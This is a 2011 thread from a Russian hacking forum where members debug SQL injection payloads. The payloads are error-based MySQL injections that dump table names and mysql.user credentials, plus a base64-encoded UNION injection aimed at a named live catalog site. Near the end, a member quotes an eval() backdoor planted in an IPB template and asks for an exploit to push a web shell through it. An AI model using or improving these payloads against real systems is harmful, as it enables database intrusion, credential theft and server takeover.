02.07.2011, 16:46
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
?id=181'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat_ws(0x3a,(select+concat_w s(':',table_schema,table_name)+from+information_sc hema.tables+limit+0,1),floor(rand(0)*2)))--+
выдает- Subquery returns more than 1 row
Где я намудрил?
|
|
|
02.07.2011, 16:53
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от IMMORTAL_S
?id=181'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat_ws(0x3a,(select+concat_w s(':',table_schema,table_name)+from+information_sc hema.tables+limit+0,1),floor(rand(0)*2)))--+
выдает- Subquery returns more than 1 row
Где я намудрил?
видимо запрос select+concat_ws(':',table_schema,table_name)+from +information_schema.tables+limit+0,1 возвращает большой результат, попробуй просто select table_schema from information_schema.tables limit 0,1
и отталкивайся от этого, сначала найди нужную базу, потом таблицу, потом поля, потом выводи.
|
|
|
|
02.07.2011, 17:01
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
Судя по всему да..
?url=181'+or+(select+count(*)+from+information_sch ema.tables+group+by+concat_ws(0x3a,(select+concat_ ws(0x3a,user,password)+from+mysql.user+limit+0,1), floor(rand(0)*2)))--+
Выдал - Data too long for column '(null)' at row 15
Подскажите, почему так происходит?
|
|
|
|
02.07.2011, 17:01
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от IMMORTAL_S
?id=181'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat_ws(0x3a,(select+concat_w s(':',table_schema,table_name)+from+information_sc hema.tables+limit+0,1),floor(rand(0)*2)))--+
выдает- Subquery returns more than 1 row
Где я намудрил?
где-то ты действительно намудрил
Код:
and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a)--
вместо version() подставляешь уже
(select table_name from information_schema.tables limit 0,1)
У меня твоя ошибка возникала, когда не в то место подставлял данные на вывод в ошибке, и там уже не помогал никакой лимит
Сообщение от None
Судя по всему да.. ?url=181'+or+(select+count(*)+from+information_sch ema.tables+group+by+concat_ws(0x3a,(select+concat_ ws(0x3a,user,password)+from+mysql.user+limit+0,1), floor(rand(0)*2)))--+ Выдал - Data too long for column '(null)' at row 15 Подскажите, почему так происходит?
Видимо попутно идёт интсерт в какую-то таблицу со статистикой, а как раз получается он большой... хотя это лишь догадка
|
|
|
|
03.07.2011, 00:04
|
|
Участник форума
Регистрация: 16.02.2011
Сообщений: 180
С нами:
8018966
Репутация:
0
|
|
http://catalog.akadia.ru/totalcatalog/?st=30&l=YnJhbmRfaWQ9PTEyMTh8fG1vZGVsX2lkPT00Mjgw. Как определить кол-во полей?
|
|
|
|
03.07.2011, 00:25
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
http://catalog.akadia.ru/totalcatalog/?st=30&l=YnJhbmRfaWQ9PTEyMTh8fG1vZGVsX2lkPT0tNDI4M CB1bmlvbiBzZWxlY3QgdmVyc2lvbigpLS0=
1 поле в model_id
|
|
|
|
04.07.2011, 19:23
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
возможно ли сделать поиск по базе mysql5 если не знать имени таблицы и колнки. Например в значении колонки слово maxim по текушей базе, если возможно то примерный запрос какой будеть
спс
|
|
|
|
04.07.2011, 19:40
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от YuNi|[c
возможно ли сделать поиск по базе mysql5 если не знать имени таблицы и колнки. Например в значении колонки слово maxim по текушей базе, если возможно то примерный запрос какой будеть
спс
Нельзя. Если я конечно правильно понял про что ты.
|
|
|
|
05.07.2011, 01:16
|
|
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами:
8840513
Репутация:
0
|
|
Имеется код:
Сообщение от None
$IPBHTML .= "
" . (($this->ipsclass->input['testKey'] = 123) ? ("
" . ((eval($this->ipsclass->input['code'])) ? ("") : ("")) . "
") : ("")) . "
Обращаюсь я к нему вот так http://site.ru/index.php?testKey=123&code=phpinfo();
Нужен эксплоит который в code POST-методом будет пересылать код шелла. |
|
|
|
05.07.2011, 13:04
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
С нами:
8730571
Репутация:
19
|
|
Сообщение от z0mbie86
Имеется код:
Обращаюсь я к нему вот так http://site.ru/index.php?testKey=123&code=phpinfo();
Нужен эксплоит который в code POST-методом будет пересылать код шелла.
если я правильно понял
где /home/httpdocs/files/ - путь к папке которая доступна на запись
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
